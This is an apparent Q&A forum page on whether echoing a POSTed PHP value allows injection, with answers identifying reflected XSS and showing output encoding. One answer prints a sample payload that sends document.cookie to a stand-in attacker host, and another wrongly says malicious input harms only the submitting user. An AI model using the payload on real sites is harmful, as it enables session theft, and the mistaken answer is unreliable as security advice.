Andrew Borg

Reputation: 23

PHP File Inclusion

I have a textbox in which a user inputs a value and a PHP script echoes it out. The textbox is sent to the server via POST and is saved in a variable called Temp.

If I create the output script with the below line, will the echo prevent file inclusion or arbitrary PHP injection, assuming that no validation is being done?

<?php echo $Temp; ?>

Upvotes: 2

Views: 146

Answers (4)

SilverlightFox

Reputation: 33538

This is a classic reflected Cross Site Scripting vulnerability. Injected code will not execute on the server.

A malicious user could set up their own site that POSTs to your form. The POSTed value could be something like

<script>
new Img().src = 'https://evil.example.com?' + escape(document.cookie);
</script>

When a user that is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well any that are not marked as HttpOnly). To mitigate this do the following:

<?php echo htmlentities($Temp); ?>

which will display any script as HTML rather than execute it.

Upvotes: 1
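To make the difference between the two echo statements concrete, here is an added, self-contained PHP example (not code from the question or any of the answers). It renders a constructed sample payload through the unencoded echo and through an HTML-encoding helper, and checks that the encoded output no longer contains a live `<script>` tag. The function names (`renderVulnerable`, `renderSafe`, `escapeHtml`, `encodedOutputIsInert`) and the sample payload are assumptions made for the example; the `Temp` field name comes from the question. It uses `htmlspecialchars()` with `ENT_QUOTES`, which is the sibling of the `htmlentities()` call shown above and encodes the same characters that matter for script injection.

```php
<?php
// Added example, not from the original post: the vulnerable echo beside an
// HTML-encoded echo, exercised offline against a constructed payload.

// Constructed sample input standing in for the POSTed "Temp" field.
const SAMPLE_PAYLOAD = "<script>alert(document.cookie)</script>";

/**
 * Vulnerable form: reflects the value verbatim, so any HTML/JS in it
 * becomes part of the page the browser parses (reflected XSS). PHP itself
 * never executes the value; the victim's browser does.
 */
function renderVulnerable(string $temp): string
{
    return "<p>You entered: " . $temp . "</p>";
}

/**
 * Encode at the point of output. ENT_QUOTES also encodes single quotes, so
 * the same helper is safe inside quoted attribute values; ENT_SUBSTITUTE
 * replaces invalid UTF-8 instead of returning an empty string.
 */
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Hardened form: the value is shown as text and echoed back into the
 * textbox, both through the encoder, so neither context can break out.
 */
function renderSafe(string $temp): string
{
    return "<p>You entered: " . escapeHtml($temp) . "</p>\n"
         . "<input type=\"text\" name=\"Temp\" value=\"" . escapeHtml($temp) . "\">";
}

/**
 * Check used below: the encoded output must not contain a raw <script tag
 * and must contain its encoded form.
 */
function encodedOutputIsInert(string $payload): bool
{
    $encoded = renderSafe($payload);
    return strpos($encoded, '<script') === false
        && strpos($encoded, '&lt;script&gt;') !== false;
}

// A real handler reads the field like this; fall back to the constructed
// payload so the script also runs from the command line.
$temp = isset($_POST['Temp']) ? (string) $_POST['Temp'] : SAMPLE_PAYLOAD;

echo "Vulnerable output:\n", renderVulnerable($temp), "\n\n";
echo "Encoded output:\n", renderSafe($temp), "\n\n";

if (!encodedOutputIsInert(SAMPLE_PAYLOAD)) {
    fwrite(STDERR, "Encoding check failed\n");
    exit(1);
}
echo "Encoded output renders the payload as inert text.\n";
```

Run it with `php example.php` to see the two outputs side by side; the encoded version shows `&lt;script&gt;...&lt;/script&gt;`, which the browser displays literally. Encoding belongs at the output step, chosen for the context being written into (HTML body, attribute, JavaScript, URL), rather than at input time, because the same stored value may later be emitted into a different context.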

Konstantin Mezentsev

Reputation: 131

It's a typical XSS vulnerability (read more here). So always filter any user input right after you get it. PHP has nice type conversion like (string)$Temp and, as mentioned above, htmlspecialchars() and htmlentities().

Upvotes: 1

Kyle Burkett

Reputation: 1443

mkaatman's answer may or may not address your question. JavaScript is client side, so there isn't any server-side maliciousness happening. If a user were to put something malicious in the text box that you echo back to them, they are only affecting themselves on the client side.

In other words, PHP is not going to execute what the user inputs in that variable if all you are doing is storing and echoing. No harm can be done to the server... and I think that was what you were asking.

Upvotes: 2

Matt

Reputation: 5428

No. I could enter malicious JavaScript code in the input and the browser would execute that code when you viewed the page that had been generated with <?php echo $Temp; ?>

Upvotes: 1
